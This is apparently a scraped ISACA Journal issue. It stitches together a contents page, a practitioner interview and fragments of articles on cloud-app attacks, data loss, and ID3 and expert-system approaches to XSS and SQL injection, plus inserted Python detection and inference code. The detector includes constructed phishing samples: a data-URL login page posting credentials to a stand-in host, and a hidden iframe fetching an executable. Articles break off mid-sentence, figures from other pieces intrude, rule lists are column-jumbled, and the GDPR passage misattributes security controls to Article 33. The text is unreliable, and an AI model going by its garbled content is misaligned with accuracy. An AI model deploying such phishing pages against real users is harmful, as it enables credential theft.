Journal

The ISACA® Journal seeks to enhance the proficiency and competitive advantage of its international readership by providing managerial and technical guidance from experienced global authors. The Journal’s noncommercial, peer-reviewed articles focus on topics critical to professionals involved in IT audit, governance, security and assurance.

3 Information Security Matters: Managing Availability in the Multi-Modal Era (Steven J. Ross, CISA, CISSP, MBCP)
6 IS Audit Basics: Backup and Recovery (Ian Cooke, CISA, CGEIT, CRISC, COBIT Assessor and Implementer, CFE, CPTE, DipFM, ITIL Foundation, Six Sigma Green Belt)
10 Tools: Data Protection Tools (Ed Moyle)
42 The Machine Learning Audit—CRISP-DM Framework (Andrew Clark)
48 Implementation of Big Data in Commercial Banks (Adeniyi Akanni, Ph. D., CISA, CRISC, ITIL)

FEATURES
13 Cloudifying Threats—Understanding Cloud App Attacks and Defenses (Aditya K. Sood, Ph.D., and Rehan Jalil)
23 Mistakes Happen! Mitigating Unintentional Data Loss (Japanese edition also available) (Mike Van Stone, CISA, CISSP, CPA, and Ben Halpert)
30 Applying AI in Application Security (Kiran Maraju, CEH, CISSP)
37 Big Data Deidentification, Reidentification and Anonymization (Japanese edition also available) (Mohammed J. Khan, CISA, CRISC, CIPM)

PLUS
52 The Network (Sandy Fadale, CRISC, CISM, CGEIT)
54 HelpSource Q&A (Sunil Bakshi, CISA, CRISC, CISM, CGEIT, ABCI, AMIIB, BS 25999 LI, CEH, CISSP, ISO 27001 LA, MCA, PMP)
56 Crossword Puzzle (Myles Mellor)
57 CPE Quiz (Prepared by Kamal Khan CISA, CISSP, CITP, MBCS)
S1-S4 ISACA Bookstore Supplement

Read more from these Journal authors... Journal authors are now blogging at www.isaca.org/journal/blog. Visit the ISACA Journal blog, Practically Speaking, to gain practical knowledge from colleagues and to participate in the growing ISACA® community.

Online-Exclusive Features
Do not miss out on the Journal’s online-exclusive content. With new content weekly through feature articles and blogs, the Journal is more than a static print publication. Use your unique member login credentials to access these articles at www.isaca.org/journal.

Online Features
The following is a sample of the upcoming features planned for January and February 2018.
Auditing Big Data in the Enterprise (Joshua McDermott, CISA, CEH, CISSP, PMP)
Toward Encrypted and Private Databases (Josh Joy)
When What Is Lost Is Lost Forever (William Emmanuel Yu, Ph.D., CRISC, CISM, CISSP, CSSLP)

ISACA, 3701 Algonquin Road, Suite 1010, Rolling Meadows, Illinois 60008 USA. Telephone +1.847.660.5505, Fax +1.847.253.1755, www.isaca.org
Building Tomorrow’s Leaders, Today

Sandy Fadale, CRISC, CISM, CGEIT, is a senior security consultant with Mariner Security Solutions. She has more than 25 years of in-depth IT experience in the field of enterprise computing with an emphasis on information security, which includes IT security, application development and business continuity. Prior to Mariner Security Solutions, Fadale was a senior manager at Bell Aliant, a manager with Ernst & Young LLP, and a manager with Visteon Corporation in its information security and risk advisory practices. She also served in the US military in telecommunications, utilizing various encryption techniques. She has been the president of the ISACA® Atlantic Provinces Chapter since 2008. Fadale teaches Certified in Risk and Information Systems Control™ (CRISC™), Certified Information Security Manager® (CISM®), and Certified in the Governance of Enterprise IT® (CGEIT®) certification review courses and is a subject matter expert who has assisted in the creation of the 2012, 2013 and 2014 editions of the ISACA CRISC® Review Manual.

Q: How do you think the role of the information security professional is changing or has changed?

A: It has long been said that employees are the biggest threat, but I do not believe that has ever been so true as it is now. I believe information risk management is one of the most important skills a security professional needs to possess today to provide value. From small start-ups to large organizations, information assets are leaving our organizations and the ability to understand where they are and how to secure them is extremely challenging.

Gone are the days we would issue edicts (back in the late 1980s and ‘90s). We are now advisors and we need to understand governance and compliance, privacy, metrics and data analytics, as well as business consulting skills.

Protecting information, no matter where it is located, requires a different way of thinking. Information security professionals who are used to concentrating on technology need to change their focus to business processes and data. Cloud computing and mobile devices are controlling this evolution; they are requiring that security professionals spend more time on governance and providing advice to organizations than on direct operational responsibilities for cloud and mobile environments.

Q: What leadership skills do you feel are critical for professionals to be successful in the field of information security?

A: I believe analytical skills are critical for information security professionals. Analytical skills refer to the ability to collect and analyze information, solve problems, and make decisions. These strengths can help increase and benefit an organization’s productivity.

Employers look for employees who use clear, logical steps and excellent judgment to understand an issue from all angles before executing an action.

There are five skills that fall under analytical skills that I believe are important to master: communication, creativity, critical thinking, data analysis and research capabilities.

Q: What is the best way for someone to develop those skills?

A: Having a mentor to teach you how to fine-tune analytical skills is really helpful. Do not feel as though you have ever mastered this area. Always continue to refine it.

But how do you go about selecting a mentor? Find someone to emulate, and study that person. Then ask him/her to be a mentor. Ensure that the person understands the area in which you want to grow and why you chose him/her. Continuously evaluate your growth and your mentored relationship. It may be awkward at first, but let the relationship develop organically. As the relationship grows and you are being challenged, do not run away.

Q: What advice do you have for information security professionals as they plan their career paths and look at the future of information security?

A: This is not a cut-and-dried topic. It is extremely complex and usually depends on a combination of technical skills, nontechnical skills and personal interest. I do not believe that just anyone can be a technical security professional. One must understand networking, route switching, common hacking techniques plus many other areas. I have built my career on the people, process, governance and risk management side of the house. So, those starting a career must really understand which path they want to take: the super-cool “How do hackers think?” technical side or the governance, risk and compliance side.

How people gain knowledge is as individual as the individual. For example, you can go to university and specialize. Once university is completed and you are in a junior role, you can then pursue certification (and there are many of those). That said, however, just having a certification
does not make an effective security professional. I worry that recruiters and human resources (HR) departments often rely too heavily on paper-based qualifications, given the pressing need to fill open positions.

Information security as a career choice is hugely rewarding. Regardless of the discipline chosen, security requires life-long learning and constant change. Security professionals never grow bored.

Q: What do you think are the most effective ways to address the cyber security skills gap and, especially, the lack of women in the cyber security workspace?

A: Part of the problem stems from the lack of information about careers in information security. This issue traces its roots all the way down to parents and school counselors not knowing about the full range of opportunities or, at best, reducing the field to looking only to the specialty of hacking.

Often, parents and students are told that the only way to follow a security career path is to go through a traditional computer science program or a networking program, then switch into security. This may have been the reality 10 years ago, but it is no longer the case: An increasing number of schools are offering graduate and even undergraduate careers.

Organizations need to retain employees as the opportunities for switching jobs for more money are numerous in this field. Retention techniques include providing opportunities for continuing education and professional development and setting a clear path for development.

Information security professionals can work together to begin to make a difference in the cyber security talent shortage. Efforts can range from retraining existing employees, to recruiting high schoolers into specific educational pathways, to bringing together the government sector, private sector and academia to share amazing opportunities for employment and growth in the ever-expanding field of cyber security.

Q: You served in the US military. How did that experience shape your professional experience as a civilian?

A: When I was in the military in the late ‘70s, I got a taste of security as I set up encrypted communications channels using 16-bit encryption, and I knew this was the career for me. Security was not a “thing” after I got out of the military as a disabled veteran in 1980. However, in 1986, I went back to school and graduated with a computer position happened to come up in 1989 and I took it. The rest is history.

I think I was shaped by the military in my discipline and respect for people. I was raised that your word is everything and a handshake is binding, and the military reinforced that.

Q: What has been your biggest workplace or career challenge and how did you face it?

Working in a truly global organization several years ago, I was faced with understanding privacy laws, security laws and regulations around the globe. Security policies could not be written at a parent company and pushed out to its affiliates because countries’ laws differed.

We had an incident in Italy that we needed to investigate. During the investigation, I received a call from our legal department asking what I was doing, so I told them. I was promptly advised that Italy has some of the strictest privacy laws in the world and I should not be able to see what I had seen. We ended up building a small data center there so information would remain in-country.

I had to update the policies to better reflect the laws around the world.

2. What are your three goals for 2018?
• Obtain my Certified Information Systems Auditor® (CISA®) certification
• Build Mariner Security Services (MSS) Training product line into a well-respected training offering in Atlantic Canada
• Help grow the MSS business

3. What is your favorite blog?
Krebs on Security @briankrebs

4. What is on your desk right now?
Coffee (decaffeinated), two monitors, wireless keyboard, wireless mouse and mouse pad, a light and my client notes notebook

5. Who are you following on Twitter?
Green Party Canada, Digital Forensics, Peter Morin, Paul Jauregui, TrendLabs, Think Progress, Kaseya, The IoT, Dark Reading, among others

6. How has social media impacted you professionally?
It allows me to have the latest trends at my fingertips.

7. What is your number-one piece of advice for other information security professionals, especially women?
Be confident in what you know. There is a fine line between assertion and aggression—do not cross it.

8. What do you do when you are not at work?
Spend time with my wife outdoors, camping, playing Pickleball and practicing yoga
Cloudifying Threats
Understanding Cloud App Attacks and Defenses

Cloud applications (apps) and services have revolutionized business productivity and efficiency by providing a robust and flexible environment in which to share and transfer data. Businesses are becoming more dependent on the cloud as the trend of adopting cloud apps is growing at an exponential rate. End users do not have a choice, as cloud apps are being shipped to them as default software in the hardware devices. For example, mobile devices are shipped with default cloud apps. Additionally, enterprise cloud apps are being used as storage solutions to host, manage and share data. That being said, every technology is susceptible to abuse and exploitation, and cloud apps are no exception.

Hackers and agents of foreign nations are increasingly exploiting cloud apps to perform nefarious operations that could potentially result in significant financial losses and compliance-related fines, in addition to loss of reputation to individuals and enterprises alike.

Before trying to understand potential cloud threats, IT departments need to have complete visibility into the channels through which data flow between users and cloud apps that exist outside of the network and perimeter security defenses. While the threats posed by shadow IT and shadow data1 are real and persistent, enterprises are not staffed or equipped to determine how their users are accessing and transmitting the enormous flow of confidential data to and among different cloud apps. To determine this, enterprises must first gain visibility into all cloud apps being accessed by their network users before trying to understand the risk that malware and user activity pose to confidential company data.

Cloud apps have faced a wide variety of threats over the last couple of years. Google Drive has been hit by a number of phishing attacks where HTML/JavaScript (JS)2 and OAuth3 functionalities were abused to steal user account credentials. Dropbox, OneDrive and other cloud apps have been used to distribute malware4, 5 to user systems. Configuration errors in cloud storage apps such as Amazon Web Services (AWS) have led to unintentional data exposure, causing security breaches that severely impacted affected organizations. Data leakage via AWS buckets6, 7 is a grave threat to enterprises, as a small error could result in broad exposure of sensitive data. Finally, inherent design and security issues in cloud apps8 have been regularly exploited by hackers to execute large-scale exploits. Overall, threats to cloud apps are real and enterprises must fully understand them, the potential impact to their business, and how to defend against attacks on cloud apps to protect user confidentiality and compliance-related data.
– Phishing pages deployed as attachments—Attackers can abuse the functionality of data URLs supported by their browser. It is possible to encode data in a “data:text/html” handler, and when allowed to open in the browser’s address bar, it renders the content. Attackers are using this trick to encode phishing web pages in the data handler and pass them as attachments in phishing emails. When the user opens the attachment, the content (data handler) is opened in the browser address bar and it renders the decoded phishing web page. Figure 2 shows an example of this variant.

– Phishing pages deployed on noncloud app domains—This is the most widely used phishing technique, in which web pages of legitimate cloud apps are cloned, updated and deployed on noncloud app domains. Attackers select a domain that may look legitimate but is not. These attacks are executed in conjunction with social-engineering tactics to trick users into revealing their cloud app credentials. Figure 3 shows an example of a phishing attack in which a web page similar to the official login page for Office 365 is deployed on the non-cloud app domain.

Figure 3—Phishing Web Page for Office 365 Account Deployed on Noncloud App Domain

• Man-in-the-browser (MitB) attacks—MitB attacks are advanced exploits in which end-user systems are first infected with sophisticated malware, such as a bot, which is then enabled to perform advanced operations in the compromised system. The bot actually snoops communication taking place between the user’s browser and the cloud app. The bot injects unauthorized code into the browser process and logs the cloud app credentials entered by the user. This attack is different from a standard keylogging attack, as the attack model is different. MitB attack mode is currently deployed in a majority of botnets. Figure 4 shows the reverse-engineered code from a malware binary highlighting the “Pr_Write” function in the “NSPR4.DLL” library. The library is hooked by the bot to steal data entered by the user in the HTML forms opened in the Mozilla Firefox browser. Primarily, the bot hooks the critical functions imported from the libraries in the browser process to dump the credentials in the HTTP GET/POST requests.

• Man-in-the-cloud (MitC) attacks—MitC10 attacks are similar to MitB attacks. The difference is that tokens are stolen instead of account credentials. Tokens are used heavily in cloud apps as authentication mechanisms for transmitting data to cloud app application program interfaces (APIs) from authorized resources. Malware residing in the end-user system is capable of hijacking the communication channel. This is done by either hooking the cloud agent functions or using social-engineering attacks to inject attacker-supplied unauthorized synchronization tokens so that valid and unexpired tokens can be extracted to gain access to users’ accounts. Primarily, the MitC malware exploits the file synchronization services for installing additional malware, exfiltrating data and performing command and control (C&C) operations. The attack method is different, but the end result is the same: gaining access to user accounts.

Malware Distribution

Cloud app storage functionality has been abused by attackers to distribute malicious files to end users. Malware is distributed through the cloud when attackers use stealthy techniques to upload malicious files on cloud apps or share malicious files publicly by configuring global access rights. As a result, malicious files are now ready to be shared with or distributed to end users by a cloud app’s URL. To infect end users, attackers can:

• Distribute the direct cloud apps’ URLs that reference malicious files to end users either by a third-party platform or via an embedded link in a phishing email

• Conduct a stealthy drive-by download attack in which the cloud app URL that references a malicious file is embedded in a third-party website in an HTML iframe or obfuscated JavaScript. When a user visits the third-party website, the cloud app URL is rendered in the browser, which downloads the file onto the end user’s system. Attackers can opt to use advanced techniques to perform this operation covertly.

Overall, the basic idea for attackers is to weaponize cloud app storage functionality by using apps as malware delivery platforms. Figure 5 shows a malicious executable (MZ header) file (Zeus bot) successfully uploaded to Google Drive. Figure 6 shows malicious executables hosted on the AWS Simple Storage Service (S3) buckets.
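Two of the patterns above, the phishing page shipped as a “data:text/html” attachment and the drive-by page that hides a cloud storage URL in an iframe, can be checked for at the mail gateway or proxy. The following is an added example, not code from the article: the allowlisted login hosts, the cloud storage host list and the sample content are constructed for illustration and should be tuned to your own environment.

```python
"""Detection helpers for two cloud-app abuse patterns described above.

Added example, not the article's code: (1) a phishing page carried in a
data:text/html attachment and (2) a page that embeds a cloud storage URL in
an HTML iframe. Host lists and samples are constructed for illustration.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Hosts where a real cloud-app login form may legitimately post (assumed list).
LEGITIMATE_LOGIN_HOSTS = {"login.microsoftonline.com", "accounts.google.com"}
# Cloud storage hosts whose URLs are worth flagging when they appear in an iframe.
CLOUD_STORAGE_HOST_SUFFIXES = ("drive.google.com", "s3.amazonaws.com",
                               "dropbox.com", "onedrive.live.com")

DATA_URL_RE = re.compile(r"^data:text/html(?P<params>[^,]*),(?P<payload>.*)$",
                         re.IGNORECASE | re.DOTALL)


def decode_data_url(text):
    """Return the HTML carried by a data:text/html URL, or None if text is not one.

    Handles both ';base64' payloads and percent-encoded payloads.
    """
    match = DATA_URL_RE.match(text.strip())
    if not match:
        return None
    payload = match.group("payload")
    if "base64" in match.group("params").lower():
        return base64.b64decode(payload).decode("utf-8", errors="replace")
    return unquote(payload)


class PageScanner(HTMLParser):
    """Collect the features the checks need: form targets, password fields, iframes."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_field = False
        self.iframe_sources = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password_field = True
        elif tag == "iframe":
            self.iframe_sources.append(attrs.get("src") or "")


def _is_cloud_storage_host(host):
    return bool(host) and any(host == s or host.endswith("." + s)
                              for s in CLOUD_STORAGE_HOST_SUFFIXES)


def assess_content(content):
    """Classify an attachment body or a fetched page.

    Returns a list of finding strings; an empty list means nothing was flagged.
    """
    html = decode_data_url(content)
    findings = []
    if html is not None:
        findings.append("data:text/html payload rendered from attachment")
    else:
        html = content
    scanner = PageScanner()
    scanner.feed(html)
    # A credential form is only expected to post to the real cloud-app login host.
    if scanner.has_password_field:
        for action in scanner.form_actions:
            host = urlparse(action).hostname
            if host not in LEGITIMATE_LOGIN_HOSTS:
                findings.append(f"credential form posts to {host or '(relative URL)'}")
    # A cloud storage URL in an iframe is the drive-by delivery shape described above.
    for src in scanner.iframe_sources:
        if _is_cloud_storage_host(urlparse(src).hostname):
            findings.append(f"iframe loads cloud storage URL on {urlparse(src).hostname}")
    return findings


# Constructed samples (not real campaigns): a cloned login page shipped as a
# base64 data URL, and a third-party page hiding a cloud storage download.
CLONED_LOGIN_HTML = (
    '<html><body><h1>Sign in to Office 365</h1>'
    '<form action="https://office365-verify.example/post" method="post">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)
PHISHING_ATTACHMENT = ("data:text/html;base64,"
                       + base64.b64encode(CLONED_LOGIN_HTML.encode()).decode())
DRIVE_BY_PAGE = ('<html><body><p>Quarterly report</p>'
                 '<iframe src="https://payload-bucket.s3.amazonaws.com/update.exe" '
                 'width="0" height="0"></iframe></body></html>')

if __name__ == "__main__":
    for sample in (PHISHING_ATTACHMENT, DRIVE_BY_PAGE):
        print(assess_content(sample) or ["clean"])
```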
ISACA JOURNAL VOL 1 17
Figure 5—Malicious Executable File Successfully Uploaded on Google Drive
Data Exfiltration and Leakage

Data exfiltration is the process of stealing and stealthily transmitting data from compromised systems to unauthorized locations on the Internet. Since enterprise cloud apps store sensitive data in the cloud, they are vulnerable to security breaches that result in the leakage of data due to human error or hackers. Data can be exfiltrated or leaked from the cloud apps in multiple ways, including:

• Users of enterprise cloud apps can share sensitive documents with a broad audience by making documents public through configuring access rights in an insecure manner, e.g., sharing sensitive files publicly via Google Drive, Box or other similar sharing sites. Amazon S3 buckets have been under the radar because multiple instances have been noted where sensitive data were disclosed via S3 buckets.

• Users can upload files containing sensitive data such as personally identifiable information (PII), payment card industry (PCI) information, and protected health information (PHI) on cloud apps and share those files in an insecure manner with other users.

• Attackers can validate and verify sensitive files hosted in compromised cloud accounts and exfiltrate the data by making those files public and downloading them onto an unauthorized server, and by sending files as attachments via emails using compromised user accounts.
There are a few critical points of GDPR that pertain to security. The most relevant articles related to security in GDPR are:

• Article 33 of the GDPR details the requirements that need to be followed by data processors and controllers when implementing technical and security controls to ensure that data stay secure and private. The controls must guarantee the security, availability, confidentiality and integrity of data, including system resiliency. The expectation is to achieve stable and secure systems with maximum availability.

Security breaches in cloud apps could be a result of inherent cloud threats. As a result, enterprises can suffer financial losses by failing to adhere to compliance requirements. To avoid financial repercussions, it is essential to combat threats against cloud apps to provide a secure, safe and compliant environment.

Recommendations and Countermeasures

The following are the recommended countermeasures essential to defending against threats to cloud apps:
Figure 1—Top Five Issues in Investigated Cases Closed With Corrective Action

Year | Issue 1                          | Issue 2    | Issue 3                   | Issue 4                   | Issue 5
2015 | Impermissible Uses & Disclosures | Safeguards | Administrative Safeguards | Access                    | Technical Safeguards
2014 | Impermissible Uses & Disclosures | Safeguards | Administrative Safeguards | Access                    | Technical Safeguards
2013 | Impermissible Uses & Disclosures | Safeguards | Access                    | Administrative Safeguards | Minimum Necessary

Source: Department of Health and Human Services Office for Civil Rights, “Top Five Issues in Investigated Cases Closed with Corrective Action, by Calendar Year,” USA. Reprinted with permission.
End users can often be the root cause of data losses. For example, the 2016 California Data Breach Report findings shown in figure 3 reflect a common theme.18 The errors category, totaling 17 percent of the breaches between 2012 and 2015, represents incidents stemming from anything insiders (employees or service providers)

[Figure 3 (chart, partially recovered): Malware and Hacking, 356 (54%); n=657 breaches. Source: Harris, K.; “California Data Breach Report 2012-2015,” California Department of Justice, USA, February 2016. Reprinted with permission.]
and determining the best attribute according to entropy and gain with algorithms such as Iterative Dichotomiser 3 (ID3).2

The information gain (G), G(S,A), where A is an attribute and S is a sample of training examples:
p+ is the positive examples in S
p- is the negative examples in S

• Entropy of S: Average optimal number of bits to encode information about certainty/uncertainty. Entropy (E) is the minimum number of bits needed to classify an arbitrary example as yes or no.

Entropy(S) = -p_{+} \log_2 p_{+} - p_{-} \log_2 p_{-}

• Gain(S,A): Reduction in entropy after choosing attribute A

Gain(S,A) = Entropy(S) - \sum_{v \in Values(A)} \frac{|S_v|}{|S|} Entropy(S_v)

Therefore, the entropy of the training data, E(S), can be represented as E([3+, 9-]) because out of the 12 training examples, three of them are attack success and nine of them are attack fails. Figure 4 describes attack paths and their outcomes.

The previous attack paths are provided as training sets to the decision support system, and the input is passed through this decision-support system. This is depicted in figure 3 as the XSS attack decision tree. When the input data validation is not performed, this will check for output data validation and, if output data validation is not performed, it will check for data type and provide the outcome as attack success (i.e., XSS attack is possible) or attack fail (i.e., XSS attack is not possible). For attack path P13, input data validation is performed with the decision-tree outcome attack fail. This means that XSS is not possible using the above training sets.

Figure 3 is the XSS vulnerability decision tree. Similar types of decision trees can be created for various application security vulnerabilities to correlate, identify and predict the security threats once these decision trees are constructed for various security vulnerabilities. These decision support system rules can be leveraged as inference rules for the application security expert systems.

Application Security Expert Systems

Expert systems are capable of interpreting the provided input, advising and deriving a solution. They also provide suggested alternatives to the problem and predict the results. Figure 5 illustrates the components of an expert system—knowledge base and inference engine. The knowledge base comprises information that is factual and heuristic (guessable), including rules and facts. If-then-else rules are a part of the knowledge representation. Information acquired from security experts is fed to the expert systems in the form of if-then-else rules to develop security expert systems. Facts are the assertions.
[Figure 3, XSS attack decision tree (values recovered from the figure): nodes Input Validation, Output Validation and Data type with leaves Attack Fail and Attack Success; node entropies S (3+, 9–) E = 0.81, S (3+, 3–) E = 1, S (1+, 3–) E = 0.81.
Gain (S, input) = 0.81 – 6/12*1 – 6/12*0 = 0.31
Gain (S, output) = 0.81 – 6/12*1 – 6/12*0 = 0.31
Gain (S, datatype) = 0.81 – 4/12*0.81 – 4/12*0.81 – 4/12*0.81 = 0
Input Validation and Output Validation provide greater information gain than Data type, w.r.t. target classification.]
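The entropy and gain computation above can be carried through end to end with ID3. This is an added example, not the article’s code or its figure 4 data: the 12-row training set is constructed so that it reproduces the quoted values (E(S) = 0.81, Gain(S, input) = Gain(S, output) = 0.31, Gain(S, datatype) = 0); with this set the tree becomes pure after the output-validation split, so the data-type branch is never needed.

```python
"""ID3 attribute selection and classification for the XSS decision tree.

Added example, not the article's code. The entropy and gain formulas are
the ones quoted above; the 12-row training set is constructed to reproduce
the figures quoted for the tree and is not the article's figure 4 data.
"""
from collections import Counter
from math import log2

TARGET = "outcome"
ATTRIBUTES = ["input_validation", "output_validation", "datatype"]

# Constructed training examples: 3 attack successes, 9 attack fails.
TRAINING = [
    {"input_validation": iv, "output_validation": ov, "datatype": dt, TARGET: out}
    for iv, ov, dt, out in [
        ("no", "no", "string", "attack success"),
        ("no", "no", "integer", "attack success"),
        ("no", "no", "other", "attack success"),
        ("no", "yes", "string", "attack fail"),
        ("no", "yes", "integer", "attack fail"),
        ("no", "yes", "other", "attack fail"),
        ("yes", "no", "string", "attack fail"),
        ("yes", "no", "integer", "attack fail"),
        ("yes", "no", "other", "attack fail"),
        ("yes", "yes", "string", "attack fail"),
        ("yes", "yes", "integer", "attack fail"),
        ("yes", "yes", "other", "attack fail"),
    ]
]


def entropy(examples):
    """Entropy(S) = -p+ log2 p+ - p- log2 p-; 0 for an empty or pure set."""
    n = len(examples)
    if n == 0:
        return 0.0
    counts = Counter(ex[TARGET] for ex in examples)
    return -sum((c / n) * log2(c / n) for c in counts.values())


def information_gain(examples, attribute):
    """Gain(S, A) = Entropy(S) - sum over v in Values(A) of |S_v|/|S| * Entropy(S_v)."""
    n = len(examples)
    gain = entropy(examples)
    for value in sorted({ex[attribute] for ex in examples}):
        subset = [ex for ex in examples if ex[attribute] == value]
        gain -= len(subset) / n * entropy(subset)
    return gain


def best_attribute(examples, attributes):
    """ID3 choice: the attribute with the largest gain (first one wins a tie)."""
    return max(attributes, key=lambda a: information_gain(examples, a))


def build_tree(examples, attributes):
    """Recursive ID3. A node is either a leaf label or (attribute, {value: subtree})."""
    counts = Counter(ex[TARGET] for ex in examples)
    if len(counts) == 1:                      # pure subset: leaf
        return next(iter(counts))
    if not attributes:                        # nothing left to split on: majority
        return counts.most_common(1)[0][0]
    attr = best_attribute(examples, attributes)
    remaining = [a for a in attributes if a != attr]
    branches = {}
    for value in sorted({ex[attr] for ex in examples}):
        subset = [ex for ex in examples if ex[attr] == value]
        branches[value] = build_tree(subset, remaining)
    return (attr, branches)


def classify(tree, attack_path):
    """Walk the tree for one attack path (a dict of attribute values)."""
    while isinstance(tree, tuple):
        attr, branches = tree
        value = attack_path[attr]
        if value not in branches:
            raise ValueError(f"no branch for {attr}={value!r}")
        tree = branches[value]
    return tree


if __name__ == "__main__":
    for attr in ATTRIBUTES:
        print(f"Gain(S, {attr}) = {information_gain(TRAINING, attr):.2f}")
    tree = build_tree(TRAINING, ATTRIBUTES)
    # Attack path P13 in the text: input validation is performed -> attack fail.
    print(classify(tree, {"input_validation": "yes",
                          "output_validation": "no", "datatype": "string"}))
```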
Security Code Review Inference Engine—Expert Systems Forward Chaining

The security code review inference engine with forward chaining3 can be used to predict values, i.e., deriving what can happen next. This will help the security code review engines to actually determine the type of attack. Figure 6 details the SQL injection4 vulnerability, with the forward chaining inference rules using if-then-else rules by matching the various conditions.

SQL injection is a web application security vulnerability where input data submitted to web applications are not validated properly for malicious inputs. Using SQL injection vulnerability attacks, attackers will inject malicious SQL commands to the back-end database and exfiltrate database details. Figure 7 describes the security code review inference engine and forward chaining rules.

• Fact 4: X is passed through a database call.

Rules
• Rule 1: If X is a form parameter and X contains special characters, then X is a tainted input.
• Rule 2: If X is a URL parameter and X contains special characters, then X is a tainted input.
• Rule 3: If X is a cookie parameter and X contains special characters, then X is a tainted input.
• Rule 4: If X is a file import and X contains special characters, then X is a tainted input.
• Rule 5: If X is an HTTP header and X contains special characters, then X is a tainted input.
• Rule 6: If X is a tainted input and input is not white-list input validation processed, then X is an unvalidated input.
[Figure 7 (partially recovered): Goal: vulnerable pattern matching rules fired with the matched vulnerability goal.]
• Rule 7: If X is a tainted input and X is not blacklist input validation processed, then X is an unvalidated input.
• Rule 8: If X is a tainted input and not an escaping input, then X is an unvalidated input.
• Rule 9: If X is an unvalidated input and X is not processed in prepared statements (with parameterized queries), then X is a potential SQL injection input.
• Rule 10: If X is an unvalidated input and X is passed through a database call, then X is a potential SQL injection input.

Figure 8 details the rules matching the current working memory, conflict set, rule fired and the next cycle after a rule has fired.

used for diagnosis of the values, i.e., deriving what happened. This application security remediation guidance expert system helps the developer to determine various possible sub-goals (solutions) to fix the vulnerabilities. Figure 9 describes backward chaining expert systems that provide guidance for security vulnerabilities with inputs as goals and facts and outcomes as possible matched sub-goals.

Figure 10 details the application security remediation guidance rules for SQL injection remediation vulnerability where rules 14, 15 and 16 will be sub-goals. These sub-goals can be treated as possible solutions that a developer can implement to remediate the SQL attack, i.e., escape the input or implement blacklist/white-list input validation for special characters.
[Figure 9 (partially recovered): Input (Goal and Facts) from User/Security Auditor. Goal 1: Vulnerability 1, SQL Injection, matched by Inference Rule 1 and Inference Rule 2 to Sub-Goal 1. Goal 2: Vulnerability 2, Cross-Site Scripting, matched by Inference Rule 3 and Inference Rule 4 to Sub-Goal 2. Output: Matched Vulnerability Sub-Goals.]
• Rule 12: If X is a potential SQL injection input, then • Rule 16: If X is an unvalidated input, then X is a
X is not processed in prepared statements (with tainted input and X is not white-list input validation
parameterized queries). processed (sub-goal).
• Rule 13: If X is a potential SQL injection input, then • Rule 17: If X is a tainted input, then X is from HTTP
X is passed through a database call. request header and X contains special characters.
• Rule 14: If X is an unvalidated input, then X is a • Rule 18: If X is a tainted input, then X is from file
tainted input and not an escaping input (sub-goal). import and X contains special characters.
• Rule 15: If X is an unvalidated input, then X is a • Rule 19: If X is a tainted input, then X is from
tainted input and X is not blacklist input validation cookie parameter and X contains special
processed (sub-goal). characters.
• Rule 20: If X is a tainted input, then X is from URL security expert systems. Training sets are
parameter and X contains special characters. incrementally developed to create hypotheses
to derive conclusions. The application security
• Rule 21: If X is a tainted input, then X is from
expert systems with forward and backward
parameter and X contains special characters.
chaining can also be used to determine the security
vulnerabilities, i.e., deriving consequences based on
Figure 11 details the rules matching the current
possible antecedents (matched rules), and can also
working memory, conflict set, rule fired and the next
be used for advising security vulnerability coding
cycle after a rule has fired.
remediation solutions to fix the vulnerabilities.
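The rule cycle the text describes (working memory, conflict set, rule fired, next cycle) can be run directly. The following Python is an added example, not code from the article or its author: it encodes rules 9, 10, 14, 15 and 16 as predicate sets over one input X, fires them forward until nothing new can be added, and records the per-cycle trace that Figures 8 and 11 tabulate. The predicate names, the conflict-resolution strategy (lowest-numbered rule first) and the `justify` helper for the backward-chaining step are assumptions of this example.

```python
"""Forward-chaining engine over the SQL injection rules listed above.

Facts are predicates about one input X (e.g. "unvalidated"); a rule fires
when all of its antecedents are in working memory and it still has a new
fact to add. Each cycle records working memory, the conflict set and the
rule fired, which is the trace the article's Figures 8 and 11 describe.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    antecedents: frozenset  # predicates that must all hold for X
    consequents: frozenset  # predicates asserted about X when the rule fires


# Rules 9, 10, 14, 15 and 16 from the article, as predicate sets over X.
# The predicate names (unvalidated, not_prepared_statement, ...) are chosen
# for this example; they are not identifiers from the article.
RULES = [
    Rule("Rule 9", frozenset({"unvalidated", "not_prepared_statement"}),
         frozenset({"potential_sqli"})),
    Rule("Rule 10", frozenset({"unvalidated", "database_call"}),
         frozenset({"potential_sqli"})),
    Rule("Rule 14", frozenset({"unvalidated"}),
         frozenset({"tainted", "subgoal:escape_input"})),
    Rule("Rule 15", frozenset({"unvalidated"}),
         frozenset({"tainted", "subgoal:blacklist_input_validation"})),
    Rule("Rule 16", frozenset({"unvalidated"}),
         frozenset({"tainted", "subgoal:whitelist_input_validation"})),
]


def conflict_set(rules, memory):
    """Rules whose antecedents are satisfied and that would add a new fact."""
    return [r for r in rules
            if r.antecedents <= memory and not r.consequents <= memory]


def forward_chain(initial_facts, rules=RULES):
    """Fire rules until quiescence; return final memory and a per-cycle trace."""
    memory = set(initial_facts)
    trace = []
    cycle = 1
    while True:
        conflicts = conflict_set(rules, memory)
        if not conflicts:
            break
        fired = conflicts[0]  # conflict resolution: lowest-numbered rule first
        trace.append({
            "cycle": cycle,
            "working_memory": sorted(memory),
            "conflict_set": [r.name for r in conflicts],
            "rule_fired": fired.name,
        })
        memory |= fired.consequents
        cycle += 1
    return memory, trace


def remediation_subgoals(memory):
    """Sub-goals (rules 14-16) a developer can implement to fix the input."""
    return sorted(f.split(":", 1)[1] for f in memory if f.startswith("subgoal:"))


def justify(goal, memory, rules=RULES):
    """Backward step: which rules could derive `goal` from the facts held?"""
    return [r.name for r in rules
            if goal in r.consequents and r.antecedents <= memory]


if __name__ == "__main__":
    # Constructed facts for one request parameter concatenated into SQL text.
    facts = {"unvalidated", "not_prepared_statement", "database_call"}
    final, steps = forward_chain(facts)
    for step in steps:
        print(step)
    print("potential SQL injection input:", "potential_sqli" in final)
    print("remediation sub-goals:", remediation_subgoals(final))
    print("derived by:", justify("potential_sqli", facts))
```

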